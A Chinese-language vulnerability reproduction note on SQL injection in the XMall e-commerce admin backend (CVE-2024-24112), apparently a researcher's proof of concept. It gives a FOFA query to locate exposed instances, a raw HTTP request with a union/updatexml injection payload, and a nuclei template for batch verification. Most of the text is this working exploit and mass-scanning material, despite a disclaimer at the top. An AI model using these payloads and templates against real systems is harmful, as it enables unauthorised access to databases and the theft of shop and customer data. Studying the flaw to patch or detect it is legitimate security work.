免责声明:
本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
漏洞描述
xmall是一个基于SOA架构的分布式电商购物商城,前后端分离,该系统/item/list、/item/listSearch、/sys/log、/order/list、/member/list、/member/list/remove等多处接口存在SQL注入漏洞,会造成数据泄露。
fofa语句
app="XMall-后台管理系统"漏洞复现
打开页面
构造payload
GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,md5(102103122),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7
Connection: close
X-Requested-With: XMLHttpRequest
nuclei批量验证
id: Exrick-SQLi-CVE-2024-24112
info:
name: Exrick XMall 开源商城 SQL注入漏洞
author: fgz
severity: high
description: xmall是一个基于SOA架构的分布式电商购物商城,前后端分离,该系统/item/list、/item/listSearch、/sys/log、/order/list、/member/list、/member/list/remove等多处接口存在SQL注入漏洞,会造成数据泄露。
metadata:
max-request: 1
fofa-query: app="XMall-后台管理系统"
verified: true
requests:
- raw:
- |+
GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,md5(102103122),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7
Connection: close
matchers:
- type: dsl
dsl:
- "status_code == 200 && contains(body, '6cfe798ba8e5b85feb50164c59f4bec')"